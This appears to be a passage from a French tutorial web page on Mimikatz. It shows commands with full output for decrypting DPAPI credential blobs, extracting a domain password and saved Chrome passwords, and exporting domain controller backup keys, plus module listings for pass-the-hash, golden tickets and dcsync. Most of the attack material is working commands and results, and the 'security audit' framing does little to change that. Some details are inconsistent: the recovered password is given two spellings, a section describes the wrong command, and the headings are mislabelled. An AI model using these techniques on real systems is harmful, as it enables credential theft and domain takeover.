        C'est la version de la clé maître utilisée pour chiffrer le blob.
        C'est l'identifiant unique de la clé maître utilisée pour chiffrer le blob.
        Il s'agit de drapeaux supplémentaires associés au blob.
      

      

        DWDescriptionLen
        SZDescription
        ALGCrypt
      

      

        C'est la longueur de la description du blob (dans ce cas, la description est vide).
        C'est la description du blob (dans ce cas, elle est vide).
        C'est l'algorithme de chiffrement utilisé pour chiffrer les données du blob.
      

      

        DWAlgCryptLen
        DWSaltLen
        PBSalt 
      

      

        C'est la longueur de l'algorithme de chiffrement.
        C'est la longueur du sel utilisé pour dériver la clé de chiffrement.
        C'est le sel utilisé pour dériver la clé de chiffrement.
      

      

        DWHmacKeyLen
        PBHmacKey
        AlgHash
      

      

        C'est la longueur de la clé HMAC utilisée pour signer les données du blob.
        C'est la clé HMAC utilisée pour signer les données du blob.
        C'est l'algorithme de hachage utilisé pour signer les données du blob.
      

      

        DWAlgHashLen
        DWHmac2KeyLen
        PBHmac2Key
      

      

        C'est la longueur de l'algorithme de hachage.
        C'est la longueur de la clé HMAC utilisée pour signer les données du blob.
        C'est la clé HMAC utilisée pour signer les données du blob.
      

      

        DWDataLen
        PBData
        DWSignLen
      

      

        C'est la longueur des données chiffrées dans le blob.
        Ce sont les données chiffrées dans le blob.
        C'est la longueur de la signature des données du blob.
      

      

        PBSign
        Volatile Cache
        Masterkey
      

      

        C'est la signature des données du blob.
        Cela fournit des informations supplémentaires sur le cache volatil associé au blob.
        C'est la clé maître utilisée pour déchiffrer le blob.
      

    

  














  

    

      

        
    

    

        
Mimikatz

        

          3.4 - Conversion d'Hexadécimal en Texte
        

        
L'exemple démontre la conversion d'une séquence hexadécimale en texte clair, une technique essentielle en informatique pour rendre les données binaires intelligibles. Il s'agit de transformer les hexadécimaux en bytes, puis de les convertir en texte via l'encodage UTF-8, illustrant ainsi une manière efficace de décrypter et comprendre les informations codées.
 
      

    

  







  





      

        
      

      

        

        

          
          

            
            44 6f 6e 6e c3 a9 65 73 20 63 6f 6e 66 69 64 65 6e 74 69 65 6c 6c 65 
73 20 c3 a0 20 63 68 6 66 72 65 72 2e
            
          

        

      

    




  

    
Mimikatz

    

      3.4.1 - Décryptage de Données avec Mimikatz
    

    
En utilisant la commande Mimikatz dpapi::blob, nous avons pu extraire des données chiffrées en précisant le chemin vers le fichier blob et la clé maîtresse. Cette opération a révélé une série de données sous forme hexadécimale : "44 6f 6e 6e c3 a9 65 73 20 63 6f 6e 6f 69 64 65 6e 74 69 65 6c 6c 65 73 20 c3 a0 20 63 68 69 66 66 72 65 72 2e", un exemple clair de la puissance de Mimikatz dans le décryptage et la récupération d'informations confidentielles. Ce processus démontre non seulement la flexibilité de Mimikatz dans la manipulation de divers formats de données sécurisées mais aussi souligne l'importance de sécuriser et de gérer correctement les clés de chiffrement pour protéger les données sensibles.

  




    







  

  

  
# Définir les données hexadécimales
$dataHex = "44 6f 6e 6e c3 a9 65 73 20 63 6f 6e 66 69 64 65 6e 74 69 65 6c 6c 65 73 
20 c3 a0 20 63 68 69 66 66 72 65 72 2e" 

# Convertir les données hexadécimales en tableau de bytes
$bytes = $dataHex -split ' ' | ForEach-Object { [byte]::Parse($_, 'HexNumber') }

# Convertir les bytes en texte UTF-8
$texte = [System.Text.Encoding]::UTF8.GetString($bytes)

# Afficher le texte
$texte

Données confidentielles à chiffrer.



  





    

      

        
Mimikatz

        

          3.4.2 - Analyse des résultats
         


        

Ce petit script démontre comment transformer un code hexadécimal, qui a été crypté auparavant, en texte clair, permettant ainsi de récupérer les informations initialement cachées. En convertissant les données hexadécimales en un tableau de bytes puis en les décodant en texte UTF-8, le script révèle le contenu précédemment crypté, dévoilant les données originales dans un format lisible. C'est une illustration claire de la récupération d'informations à partir de données cryptées en utilisant des méthodes de conversion de données.






      

    

  










    

        

            

                
Mimikatz

                

                    3.5 - Décryptage de credentials :
                

                  
Le déchiffrage de données protégées par DPAPI est une étape cruciale dans la récupération d'informations sécurisées. En utilisant la clé master appropriée et en localisant les données chiffrées sur le système, il devient possible de restaurer l'accès aux informations confidentielles. Ce processus permet de déverrouiller des données sensibles tout en garantissant leur sécurité et leur intégrité.
 
            

            

                
            

        

    






    

        
Emplacements des Données d'Identification dans Windows

        
Dans Windows, les données d'identification des utilisateurs, telles que les mots de passe et les informations de connexion, sont sauvegardées dans des dossiers spécifiques connus sous le nom de "Credentials". Ces dossiers sont situés dans le profil de chaque utilisateur, sous C:\Users\NomUtilisateur\AppData\Local\Microsoft\Credentials pour les informations locales et C:\Users\NomUtilisateur\AppData\Roaming\Microsoft\Credentials pour les informations qui peuvent être partagées entre plusieurs machines dans un domaine. Ces emplacements stockent des informations cruciales pour l'authentification et l'accès aux ressources et services.

        
Leur connaissance est essentielle pour la gestion des comptes utilisateur et peut être particulièrement utile pour les administrateurs système et les professionnels de la sécurité informatique cherchant à sécuriser ou à auditer les systèmes Windows.

    










    

        

            
Pour masquer les fichiers système protégés (les rendre invisibles) :

            
PowerShell :

            Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowSuperHidden" -Value 0
            
Invite de commande (CMD) :

            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
        

        

            
Pour afficher les fichiers système protégés (les rendre visibles) :

            
PowerShell :

            Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" -Name "ShowSuperHidden" -Value 1
            
Invite de commande (CMD) :

            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 1 /f
        

    







  




      

        
      

      

        

        

          
          

            
            dpapi::cred /in:"chemin_vers_les_credentials" /masterkey:clé_masterkey

            
          

        

      

    




  

    
Mimikatz

    

      3.5.1 - Commande : 
 Déchiffrage de données avec DPAPI
    

    

La commande dpapi::cred permet de déchiffrer les données sécurisées stockées dans les dossiers Credentials de Windows. En indiquant le chemin et la clé master, elle offre un accès sécurisé aux mots de passe et informations de connexion, essentiel pour les administrateurs et les experts en sécurité.

  




    



  

  
 

  
mimikatz # dpapi::cred /in:"C:\Users\Jonathan\AppData\Roaming\Microsoft\
Credentials\44A50D09E7C>86FBBCA83485A9D1BBDCE" /masterkey:ef297506dbd8aca5aa6c9
477e2fbefad243ec327e45f8a0235b6f541136584008884eccf7913756fa5832
b1371ac65c2348d4a89786b069c6fe96422ef9e514a
**BLOB**
  DWVersion          : 00000001 - 1
  GUIDProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  DWMasterKeyVersion : 00000001 - 1
  GUIDMasterKey      : {c6f319bf-f728-4299-97b3-6031713da0cf}
  DWFlags            : 20000000 - 536870912 (system ; )
  DWDescriptionLen   : 00000050 - 80
  SZDescription      : Données d’identification d’entreprise

  ALGCrypt           : 00006610 - 26128 (CALG_AES_256)
  DWAlgCryptLen      : 00000100 - 256
  DWSaltLen          : 00000020 - 32
  PBSalt              : a22d21e77314cf08e973409f45389e109b5f966c3fc189dd1d0914
09ee440017 
  DWHmacKeyLen       : 00000000 - 0
  PBHmacKey         :
  AlgHash            : 0000800e - 32782 (CALG_SHA_512)
  DWAlgHashLen       : 00000200 - 512
  DWHmac2KeyLen      : 00000020 - 32
  PBHmacKey        : 6791e1d1277b68bdaeaf193df083da29a5d88c9e9fe072e307a
71620d8b9abb8
  DWDataLen          : 000000b0 - 176
  PBData             : d520f690753985b50ead059d0b0e2f02f812042a8428b859
64247f88b90f4f1b7b934b82b543cabe8eadcdd351ab8c1686885b72e2b
e0aac9427401e739becf524214f69cf8aa26bfdedee5a88b2f1a03c2af2ea04adaa2a193
32ee3d929d07a37bc5c15ee78ff8ceff74ef9133c293618e805e82b68
70f3e9ac67f2953601fc060d06aedb730d9d80e7750b844bb6e9a
d4b102375fb53be81559545d0ff39d6fb3c5f2cbce74280d2e02206e23fd79d
  DWSignLen          : 00000040 - 64
  PBSign             : 72fc9e440a192f0c2e97d148d3921f2ec2f7c93ca3eca2f316
a1296274cad5d49fa48330ce66fe0cf86ba03b1db7a184442052851c1
607630cad31e59690b1e1

Decrypting Credential:
 * volatile cache: GUID:{c6f319bf-f728-4299-97b3-6031713da0cf};KeyHash:3fd
679f3551c7d8ad3018d936c42f1a6edaf9025;Key:available
 * masterkey     : 00f297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f
541136584008884eccf7913756fa5832b1371ac65c2348d4a89786b06
9c6fe96422ef9e5140a
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000a0 - 160
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 01/04/2024 18:35:29
  unkFlagsOrSize : 00000010 - 16
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:target=192.168.12.78
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : Admin45
  CredentialBlob : Zenxah77
  Attributes     : 0

mimikatz #



  





    

      

        
Mimikatz

        

          3.5.2 - Analyse des résultats
         


        

La commande mimikatz # dpapi::cred démontre son potentiel puissant en déchiffrant avec succès des données d'identification d'entreprise stockées sous Windows. Utilisée ici pour accéder à des informations sensibles d'un domaine spécifique, elle extrait des détails comme le nom d'utilisateur Admin45 et le mot de passe Zenzah77, prouvant l'efficacité de Mimikatz dans la récupération de données critiques. Cela souligne l'importance de protéger les clés maîtresses et d'être conscient des outils capables de percer les mesures de sécurité DPAPI de Windows.


      

    

  







  

    

      

        
    

    

        
Mimikatz

        

          3.6 - Accès aux Mots de Passe de Navigateur
        

        
L'outil dpapi::chrome de Mimikatz permet de déchiffrer et d'afficher les mots de passe stockés dans Google Chrome, en utilisant la clé master de Windows DPAPI. Cette commande est essentielle pour les experts en sécurité qui cherchent à analyser les données d'authentification sauvegardées sur un système, tout en respectant les normes éthiques et légales.
 
      

    

  







  





      

        
      

      

        

        

          
          

            
            dpapi::chrome /in:"C:\Users\Jonathan\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:ef297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f541136584008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe96422ef9e514a
            
          

        

      

    




  

    
Mimikatz

    

      3.6.1 - Récupération de Données Chrome avec dpapi::chrome
    

    
La commande dpapi::chrome de Mimikatz, exécutée avec le chemin vers les données de connexion de Google Chrome et la clé master adéquate, est un puissant moyen d'accès aux mots de passe et aux données d'identification sauvegardées dans le navigateur. Cette méthode révèle l'importance de la protection des clés master et souligne la nécessité d'une gestion sécurisée des mots de passe, en mettant en évidence la facilité avec laquelle les informations confidentielles peuvent être extraites dans un environnement non sécurisé.

  




    







  

  

  
 
mimikatz # dpapi::chrome /in:"C:\Users\Jonathan\AppData\Local\Google\Chrome
\User Data\Default\Login Data" /masterkey:ef297506dbd8aca5aa6c9477e2fbefad243ec3
27e45f8a0235b6f541136584008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe
96422ef9e514a
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
 * volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2d
d89c50536c05bdcee1a56c395e752cf;Key:available
 * masterkey     : ef297506dbd8aca5aa6c9477e2fbefad243ec327e45f8a0235b6f541136584
008884eccf7913756fa5832b1371ac65c2348d4a89786b069c6fe96422ef9e514a
> AES Key is: fd0635bf2e19d76231f649f48f4a90df3de80d3f83aa5ad016b3155fdab37fa2
URL     : https://login.live.com/ ( https://login.live.com/login.srf )
Username: exemple@hotmail.com
 * using BCrypt with AES-256-GCM
Password: MyPassword



  





    

      

        
Mimikatz

        

          3.6.2 - Analyse des résultats
         


        

Mimikatz démontre sa capacité à déchiffrer les données sécurisées dans Google Chrome, notamment en révélant des mots de passe enregistrés, à travers l'usage de la commande dpapi::chrome. En indiquant le chemin vers le fichier de données de connexion et en appliquant une clé master spécifique, Mimikatz parvient à décrypter l'AES Key grâce au système DPAPI de Windows. Ce processus permet d'exposer les identifiants d'accès, y compris l'URL d'un site, l'adresse email de l'utilisateur, et le mot de passe associé. Cet exemple souligne l'importance de la sécurité des clés master et met en évidence les risques de vulnérabilités pour les données des utilisateurs, accentuant la nécessité pour les professionnels de la sécurité de renforcer les mesures de protection contre de telles intrusions.



      

    

  







    

        

            

                
Mimikatz

                

                    3.7 - Extraction de Clés LSA :
                

                  
La commande lsadump::backupkeys est essentielle pour sécuriser les informations d'identification dans un réseau Active Directory. Elle permet d'extraire et de sauvegarder les clés LSA d'un contrôleur de domaine, assurant une récupération sécurisée en cas d'urgence. C'est une pratique de sécurité proactive pour protéger l'accès aux données sensibles.
 
            

            

                
            

        

    








  




      

        
      

      

        

        

          
          

            
            lsadump::backupkeys /system:nom_hôte_du_contrôleur_de_domaine /export

            
          

        

      

    




  

    
Mimikatz

    

      3.3.1 - Commande : 
 Déchiffrage de données avec DPAPI
    

    
La commande lsadump::backupkeys  est cruciale pour la sauvegarde des clés LSA, essentielle dans la gestion de la sécurité IT. Elle permet l'extraction sécurisée des clés nécessaires à la récupération d'accès en cas d'urgence, renforçant ainsi la résilience face aux incidents.

  




    



  

  
 

  
mimikatz # lsadump::backupkeys /export
Current prefered key:       {e3364acb-379c-4775-bef7-c3c1e1992589}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   :
        |Implementation: CRYPT_IMPL_SOFTWARE ;
        Algorithm      : CALG_RSA_KEYX
        Key Size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; 
CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key: YES 
        Private export : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e19925
89.keyx.rsa.pvk'
        PFX container  : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992
589.pfx'
        Export         : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e199
2589.der'

Compatibility prefered key: {b799ff33-a573-444f-bc86-b8aeb36fcb3f}
  * Legacy key
561acf46e03db74112af7412402415d80dfe92b0fbf57588358647007d46f28f
8f6ca1990c0fee951bd52e69e9bdfbf9c8e07be0033dff21a71d192447668096
f6e1199e5b8b61fb3ffb758a92757efe863307cefd7d773476053286c08dc7c6
87671f0e7374ccc179e6cf718673beb80dfe12bf03c7914a767a959b66478498
14527ee085f014c7574d9b9388dae00f42ee91f96e97c8272d6955e51e2d7304
67be8b32a706203bacf3abaca3d9f1ec90e4d63290e39d2e6c2465fc0e195b7a
2baadcb281537863a37c2e0f76d025ecb7a23b81970dbe2ab8e77b3b2fb617d7
bb7b81126e17a60d3023b0b8db159dd927f49136ce14f29565d3d9794d2f9c79

        Export        : OK - 'ntds_legacy_0_b799ff33-a573-444f-bc86-b8aeb36
fcb3f.key' 

mimikatz #



  





    

      

        
Mimikatz

        

          3.3.2 - Analyse des résultats
         


        

La commande dpapi::blob de Mimikatz démontre comment déchiffrer des informations protégées par DPAPI à l'aide d'une clé maîtresse spécifique. Cette opération révèle les aspects techniques tels que l'utilisation d'AES-256 pour le chiffrement et SHA-512 pour l'intégrité des données, tout en affichant les données déchiffrées. Dans cet exemple, les informations sensibles précédemment chiffrées sont exposées en format hexadécimal, fournissant un accès direct et lisible aux données originales.


      

    

  







    

        
Différence Entre les Commandes lsadump::backupkeys

        
La principale différence entre les commandes lsadump::backupkeys /export et lsadump::backupkeys /system:<nom_hôte_du_contrôleur_de_domaine> /export réside dans leur cible :

        
    
            
  • lsadump::backupkeys /export : extrait les clés de sauvegarde du système local sur lequel Mimikatz est exécuté.
    • 
            
  • lsadump::backupkeys /system:<nom_hôte_du_contrôleur_de_domaine> /export : cible un contrôleur de domaine spécifique par son nom d'hôte pour extraire les clés de sauvegarde à distance.
    • 
        

    











  

    


    
    Tableau des informations d'authentification
    



    
Récapitulatif des Clés LSA et RSA via Mimikatz

    

      

        Attribut
        Description
        Valeur
      

      

        Current Preferred Key
        Clé RSA actuellement préférée par le système
        {e3364acb-379c-4775-bef7-c3c1e1992589}
      

      

        Provider Name
        Nom du fournisseur de la clé
        Microsoft Strong Cryptographic Provider
      

      

        Implementation
        Type d'implémentation de la clé
        CRYPT_IMPL_SOFTWARE
      

      

        Algorithm
        Algorithme de la clé
        CALG_RSA_KEYX
      

      

        Key Size
        Taille de la clé en bits
        2048
      

      

        Key Permissions
        Permissions de la clé
        CRYPT_ENCRYPT; CRYPT_DECRYPT; CRYPT_EXPORT; CRYPT_READ; CRYPT_WRITE; CRYPT_MAC
      

      

        Exportable Key
        Si la clé est exportable
        YES
      

      

        Private Export
        Fichier d'exportation de la clé privée
        ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.keyx.rsa.pvk 
      

      

        PFX Container
        Fichier PFX contenant la clé
        ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.pfx
      

      

        Export
        Fichier d'exportation de la clé publique
        ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.der
      

      

        Compatibility Preferred Key
        Clé de compatibilité préférée
        {b799ff33-a573-444f-bc86-b8aeb36fcb3f}
      

      

        Legacy Key Export
        Fichier d'exportation de la clé Legacy
         ntds_legacy_0_b799ff33-a573-444f-bc86-b8aeb36fcb3f.key
      

    

  









    

        
Utilisation de Mimikatz pour l'Audit de Sécurité

        
Après l'extraction des clés via la commande lsadump::backupkeys /export, voici comment les utiliser efficacement dans un audit de sécurité :

        

        
1. Analyse et Utilisation des Clés Extraires

        
Les clés RSA et Legacy peuvent déchiffrer des données sécurisées telles que les mots de passe dans NTDS.dit ou protégées par DPAPI.

        

        
2. Déchiffrement de NTDS.dit

        
Utilisez les clés pour révéler des hash de mots de passe et autres informations critiques en déchiffrant le fichier NTDS.dit.

        
Outil recommandé : ntdsutil, esentutl.

        

        
3. Accès à des Données Protégées par DPAPI

        
Déchiffrez des données protégées par DPAPI, incluant les mots de passe de navigateur et les fichiers BitLocker.

        
Commande Mimikatz : dpapi::cred ou dpapi::masterkey.

        

        
4. Simulation d'Attaques Pass-the-Hash/Ticket

        
Simulez des attaques pour tester la résilience des systèmes et des applications.

        

        
5. Recommandations de Sécurité

        
Changez les clés LSA accessibles, auditez les comptes à risque et renforcez la protection de NTDS.dit.

        

        
Conclusion

        
Ces actions doivent être entreprises avec prudence et uniquement dans un cadre légal, visant à identifier et corriger les vulnérabilités.

    









  

    

      

        
      

      

        

        

          
          

            
            nomDuModule::
            
          

        

      

    




  

    
Nmap

  

  Aide et Options avec Mimikatz 




    
En invoquant le nom d'un module suivi de :: dans Mimikatz, vous débloquez une vue d'ensemble exhaustive de toutes les commandes spécifiques à ce module. Cette pratique révèle non seulement comment cibler précisément vos actions de sécurité, mais elle éclaire également sur les diverses méthodes d'extraction et de manipulation des données d'authentification présentes sur un système Windows. Elle englobe tout, depuis la récupération des mots de passe en clair et des hashes jusqu'à la gestion des tickets Kerberos et bien plus encore.

  







  

  

  
mimikatz # sekurlsa::

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager


mimikatz # kerberos::

Module :        kerberos
Full name :     Kerberos package module
Description :

             ptt  -  Pass-the-ticket [NT 6]
            list  -  List ticket(s)
             ask  -  Ask or get TGS tickets
             tgt  -  Retrieve current TGT
           purge  -  Purge ticket(s)
          golden  -  Willy Wonka factory
            hash  -  Hash password to keys
             ptc  -  Pass-the-ccache [NT6]
           clist  -  List tickets in MIT/Heimdall ccache


mimikatz # crypto::

Module :        crypto
Full name :     Crypto Module

Description :

       providers  -  List cryptographic providers
          stores  -  List cryptographic stores
    certificates  -  List (or export) certificates
            keys  -  List (or export) keys containers
              sc  -  List smartcard readers
            hash  -  Hash a password with optional username
          system  -  Describe a Windows System Certificate 
(file, TODO:registry or hive)
          scauth  -  Create a authentication certitifate 
(smartcard like) from a CA
        certtohw  -  Try to export a software CA to a crypto 
(virtual)hardware
            capi  -  [experimental] Patch CryptoAPI layer 
for easy export
             cng  -  [experimental] Patch CNG service for
 easy export
         extract  -  [experimental] Extract keys from CAPI
 RSA/AES provider

mimikatz # lsadump::

Module :        lsadump
Full name :     LsaDump module

Description :

             sam  -  Get the SysKey to decrypt SAM 
entries (from registry or hives)
         secrets  -  Get the SysKey to decrypt SECRETS 
entries (from registry or hives)
           cache  -  Get the SysKey to decrypt NL$KM then 
MSCache(v2) (from registry or hives)
             lsa  -  Ask LSA Server to retrieve SAM/AD 
entries (normal, patch on the fly or inject)
           trust  -  Ask LSA Server to retrieve Trust Auth 
Information (normal or patch on the fly)
      backupkeys
          rpdata
          dcsync  -  Ask a DC to synchronize an object
        dcshadow  -  They told me I could be anything I 
wanted, so I became a domain controller
         setntlm  -  Ask a server to set a new password
/ntlm for one user
      changentlm  -  Ask a server to set a new password
/ntlm for one user
         netsync  -  Ask a DC to send current and previous
 NTLM hash of DC/SRV/WKS
        packages

mimikatz # vault::

Module :        vault
Full name :     Windows Vault/Credential module


            list  -  list
            cred  -  cred

mimikatz # token::

Module :        token
Full name :     Token manipulation module

Description : Module de manipulation de jetons

          whoami  -  Display current identity
            list  -  List all tokens of the system
         elevate  -  Impersonate a token
             run  -  Run!
          revert  -  Revert to proces token


mimikatz # process::

Module :        process
Full name :     Process module


            list  -  List process
         exports  -  List exports
         imports  -  List imports
           start  -  Start a process
            stop  -  Terminate a process
         suspend  -  Suspend a process
          resume  -  Resume a process
             run  -  Run!
            runp  -


mimikatz # net::

Module :        net
Full name :

            user  -
           group  -
           alias  -
         session  -
        wsession  -
             tod  -
           stats  -
           share  -
      serverinfo  -
           trust  -
           deleg  -

mimikatz # misc::

Module :        misc
Full name :     Miscellaneous module

             cmd  -  Command Prompt          (without DisableCMD)
         regedit  -  Registry Editor         (without DisableRegistryTools)
         taskmgr  -  Task Manager            (without DisableTaskMgr)
      ncroutemon  -  Juniper Network Connect (without route monitoring)
         detours  -  [experimental] Try to enumerate all modules with
 Detours-like hooks
          memssp
        skeleton
      compressme
            lock
              wp
            mflt
   easyntlmchall
            clip


mimikatz # dpapi::

Module :        dpapi
Full name :     DPAPI Module (by API or RAW access)
Description :   Data Protection application programming interface

            blob  -  Describe a DPAPI blob, unprotect it with API or Masterkey
         protect  -  Protect a data via a DPAPI call
       masterkey  -  Describe a Masterkey file, unprotect each Masterkey 
(key depending)
        credhist  -  Describe a Credhist file
            capi  -  CAPI key test
             cng  -  CNG key test
            cred  -  CRED test
           vault  -  VAULT test
            wifi  -  WiFi test
            wwan  -  Wwan test
          chrome  -  Chrome test
             ssh  -  SSH Agent registry cache
             rdg  -  RDG saved passwords
              ps  -  PowerShell credentials (PSCredentials or SecureString)
           cache


mimikatz # sid::

Module :        sid
Full name :     Security Identifiers module

          lookup  -  Name or SID lookup
           query  -  Query object by SID or name
          modify  -  Modify object SID of an object
             add  -  Add a SID to sIDHistory of an object
           clear  -  Clear sIDHistory of an object
           patch  -  Patch NTDS Service


mimikatz # privilege::

Module :        privilege
Full name :     Privilege module

           debug  -  Ask debug privilege
          driver  -  Ask load driver privilege
        security  -  Ask security privilege
             tcb  -  Ask tcb privilege
          backup  -  Ask backup privilege
         restore  -  Ask restore privilege
          sysenv  -  Ask system environment privilege
              id  -  Ask a privilege by its id
            name  -  Ask a privilege by its name




  










  

    
Nmap

    

      Pourquoi Utiliser nomDuModule:: ?
    

    
Cette syntaxe est fondamentale pour quiconque utilise Mimikatz, que vous soyez un novice découvrant ses fonctionnalités ou un expert en sécurité à la recherche d'une commande spécifique. Elle offre un accès immédiat et structuré à une richesse d'opérations sans nécessiter une plongée profonde dans la documentation. Chaque commande listée sous cette invocation est décrite de manière succincte, facilitant son utilisation pratique dans divers scénarios de sécurité.

  



  











  

    


    

    

      Page suivante